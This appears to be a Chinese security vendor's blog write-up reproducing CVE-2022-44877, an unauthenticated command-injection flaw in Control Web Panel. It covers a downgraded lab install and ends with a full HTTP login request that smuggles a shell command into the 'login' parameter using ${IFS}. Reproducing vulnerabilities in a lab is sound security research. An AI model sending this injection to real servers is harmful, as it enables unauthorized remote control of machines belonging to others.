CVE-2022-44877 Control Web Panel login 未授权远程命令执行漏洞复现





首页 产品与服务 解决方案 客户案例 技术支持 合作发展 关于美创 用户退出 合作商登录 用户登录 申请试用

行业解决方案政府解决方案金融解决方案医疗解决方案教育解决方案能源解决方案物流交通解决方案

售后服务文档中心年度培训

渠道政策申请成为合作伙伴渠道专区

公司动态行业资讯安全研究

热门阅读

四年同行，韧性共铸：西南某商行携手美创科技再度通过年度容灾大考

2025-12-26

以“AI+数据安全”领雁！祝贺美创牵头项目入选浙江省科技厅“尖兵领雁”计划！

2025-12-22

美创AI灾备专家：引领灾备领域迈入“智能化”时代

2025-12-15

热点观察｜美创科技丁斐：数据安全 × 价值共创？可信数据空间的 “双向奔赴”

2025-12-03

美创科技高校供应链数据安全方案斩获 2025 年度 “金智奖”

2025-12-03

Strix自动渗透测试平台搭建与使用

2025-12-22

每周安全速递³⁷⁰ | 勒索软件攻击导致心理健康机构超11万人数据泄露

2025-12-19

每周安全速递³⁶⁹ | 安卓勒索软件DroidLock针对西班牙语言用户进行攻击

2025-12-15

每周安全速递³⁶⁸ | 美国电信与汽车服务巨头遭Cl0p勒索攻击

2025-12-05

每周安全速递³⁶⁷ | ShinyHunters 开发新型勒索软件ShinySp1d3r

2025-11-21

CVE-2022-44877 Control Web Panel login 未授权远程命令执行漏洞复现

发布时间：2023-02-03 阅读次数： 967 次

漏洞简介

Control Web Panel（CWP）是一个人工智能驱动的免费、专业Linux 服务器控制面板，常用于管理专用服务器和 VPS 等。在Control Web Panel 远程命令执行漏洞（CVE-2022-44877）中，攻击者可以在未授权的情况下构造特定请求触发远程命令执行，从而获取服务器的控制权限。

影响版本

Centos Web Panel 7 - < 0.9.8.1147

环境搭建

本文复现该漏洞所使用的系统为centos 7系统

执行cd /usr/local/src命令进入到/usr/local/src目录

执行wget http://centos-webpanel.com/cwp-el7-latest，拉取安装脚本

目前官方安装脚本中默认安装的是最新的0.9.8.1149版本，该版本中已经对漏洞进行了修复

所以在拉取安装脚本后，需要将安装脚本中1149的相应位置修改为低于1147的版本才能进行漏洞复现，本文修改为1146

运行sh cwp-el7-latest命令，安装脚本会自动安装Control Web Panel

安装成功后会显示MySQL超级用户密码、CWP登录URL等信息

此时访问https://ip:2031/，输入服务器的账号密码即可登录进入控制台

可以看到当前的CWP版本为0.9.8.1146

漏洞复现

目前国外安全研究员已经在github上公开了该漏洞的poc

链接为https://github.com/numanturle/CVE-2022-44877

首先退出登录

输入任意不正确的账号密码，使用burpsuite抓包

修改数据包如下，注：username必须为root，否则无法成功执行命令

POST /login/index.php?login=$(touch${IFS}/tmp/rceTest) HTTP/1.1Host: ip:2031User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 42Origin: https://ip:2031Connection: closeReferer: https://ip:2031/login/index.php?login=userloginCookie: cwpsrv-f53115a3f1840c3e155cf2187555f873=g3l0o4o056qmrbevd2o8ccdo6rUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=root&password=admin&commit=Login